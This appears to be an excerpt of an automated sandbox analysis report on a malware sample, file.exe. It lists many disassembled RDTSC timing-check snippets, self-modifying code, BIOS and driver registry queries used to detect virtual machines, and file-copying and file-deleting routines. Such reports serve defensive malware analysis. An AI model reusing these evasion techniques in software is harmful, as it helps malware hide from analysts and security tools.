Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C087 second address: 140C08B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C357 second address: 140C35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C35D second address: 140C382 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378B444AFh 0x00000007 jc 00007F4378B444A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F4378B444A6h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C382 second address: 140C386 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C386 second address: 140C394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F4378B444A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C394 second address: 140C398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C398 second address: 140C39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C39E second address: 140C3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C3A4 second address: 140C3DC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4378B444D0h 0x00000008 jmp 00007F4378B444B2h 0x0000000d jmp 00007F4378B444B8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C539 second address: 140C53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C53D second address: 140C544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1416F2B second address: 1416F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14174FA second address: 14174FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14174FF second address: 1417509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4378D5BDC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1417509 second address: 141750D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141763B second address: 1417650 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4378D5BDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F4378D5BDC6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1417650 second address: 1417660 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4378B444A6h 0x00000008 jo 00007F4378B444A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1417660 second address: 141767A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141767A second address: 141767E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141767E second address: 1417682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14184C7 second address: 14184CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141DF36 second address: 141DF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4378D5BDD8h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141DF53 second address: 141DF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F4378B444A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141DF5D second address: 141DF80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141DF80 second address: 141DF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141DF86 second address: 141DF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1440592 second address: 14405B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4378B444B8h 0x00000009 popad 0x0000000a je 00007F4378B444B2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14489E2 second address: 14489E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14472F7 second address: 1447318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378B444B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F4378B444A6h 0x0000000f jnc 00007F4378B444A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14475DC second address: 14475E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14476EF second address: 14476F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14476F5 second address: 1447714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD5h 0x00000007 jo 00007F4378D5BDC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1447714 second address: 144772B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378B444B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144772B second address: 1447731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1447731 second address: 1447735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1447D1F second address: 1447D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1447D23 second address: 1447D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1447D29 second address: 1447D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4378D5BDC6h 0x0000000a ja 00007F4378D5BDC6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144D152 second address: 144D15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4378B444A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144D15C second address: 144D160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144D160 second address: 144D168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144D168 second address: 144D16E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 145EDD6 second address: 145EDEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007F4378B444A6h 0x00000009 jnc 00007F4378B444A6h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145EDEC second address: 145EE18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F4378D5BDC8h 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F4378D5BDD4h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145EE18 second address: 145EE26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4378B444AAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145EE26 second address: 145EE2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145EE2A second address: 145EE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146C2F7 second address: 146C307 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4378D5BDC6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14821CF second address: 14821D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1482310 second address: 1482316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1482316 second address: 148231A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148231A second address: 148233E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148233E second address: 1482342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1482592 second address: 14825D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD6h 0x00000007 pushad 0x00000008 jc 00007F4378D5BDC6h 0x0000000e jg 00007F4378D5BDC6h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4378D5BDD6h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14825D3 second address: 14825DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14825DF second address: 14825E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148272F second address: 148276D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jbe 00007F4378B444F1h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4378B444B9h 0x00000012 jmp 00007F4378B444B8h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1482EC1 second address: 1482EDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD4h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148303A second address: 148305F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4378B444A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jns 00007F4378B444A6h 0x00000016 popad 0x00000017 jmp 00007F4378B444AEh 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1488AA6 second address: 1488AC5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4378D5BDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4378D5BDCDh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1488AC5 second address: 1488AFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F4378B444B4h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000004h 0x0000000e mov dx, cx 0x00000011 add dh, FFFFFFAFh 0x00000014 push D988C8F6h 0x00000019 je 00007F4378B444B2h 0x0000001f jbe 00007F4378B444ACh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1488D86 second address: 1488D90 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4378D5BDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B035A second address: 58B035E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B035E second address: 58B0364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B0364 second address: 58B036A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B036A second address: 58B036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B036E second address: 58B03A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4378B444B6h 0x00000012 sub cx, A6F8h 0x00000017 jmp 00007F4378B444ABh 0x0000001c popfd 0x0000001d mov ecx, 05CBB42Fh 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B03A8 second address: 58B03BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4378D5BDD0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B03BC second address: 58B03C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B03C0 second address: 58B03EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4378D5BDD7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop ecx 0x00000015 mov esi, edi 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B03EA second address: 58B0411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378B444B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, 4030h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B0411 second address: 58B0417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB269 second address: 13AB26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13C5C89 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1426698 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01378868 rdtsc 0_2_01378868
              Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-26452)
              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes (graph_0-25270)
              Source: C:\Users\user\Desktop\file.exe | API coverage: 4.8 %
              Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FC18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FCE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FCCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00FC23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FBDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00FC2390
